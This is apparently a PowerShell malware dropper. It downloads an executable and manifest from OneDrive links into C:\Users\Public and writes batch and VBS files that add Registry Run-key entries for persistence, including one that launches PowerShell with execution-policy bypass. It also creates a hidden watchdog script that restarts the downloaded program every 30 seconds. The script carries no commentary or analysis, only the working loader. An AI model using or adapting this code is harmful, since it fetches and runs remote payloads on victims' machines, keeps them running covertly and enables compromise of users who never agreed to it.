$download_url = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21140&authkey=AD54_li6xAtRpc8"
$local_path = "C:\Users\Public\Untitled.exe"
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($download_url, $local_path)



$download_url = "https://onedrive.live.com/Download?cid=358166AEFCA69E90&resid=358166AEFCA69E90%21139&authkey=AOITnE4lBM7QpdQ"
$local_path = "C:\Users\Public\Untitled.exe.manifest"
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($download_url, $local_path)

$Content = @'

REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\Users\Public\Untitled.exe"
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 2 /d "C:\Windows\System32\cmd.exe '/c  powershell -windo 1 -noexit -exec bypass -file C:\Users\Public\look.ps1"

'@
Set-Content -Path C:\Users\Public\1.bat -Value $Content
$Content = @'
set WshShell = wscript.createobject("WScript.shell")
WshShell.run """C:\Users\Public\1.bat"" ", 0, true
Set WshShell = Nothing

'@
Set-Content -Path C:\Users\Public\1.vbs -Value $Content

start C:\Users\Public\1.vbs

$Content = @'

while ($true){
if((get-process "Untitled" -ea SilentlyContinue) -eq $Null){
{

}

start C:\Users\Public\Untitled.exe

}
start-sleep 30
}


'@
Set-Content -Path C:\Users\Public\look.ps1 -Value $Content


powershell -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted "C:\Users\Public\look.ps1"







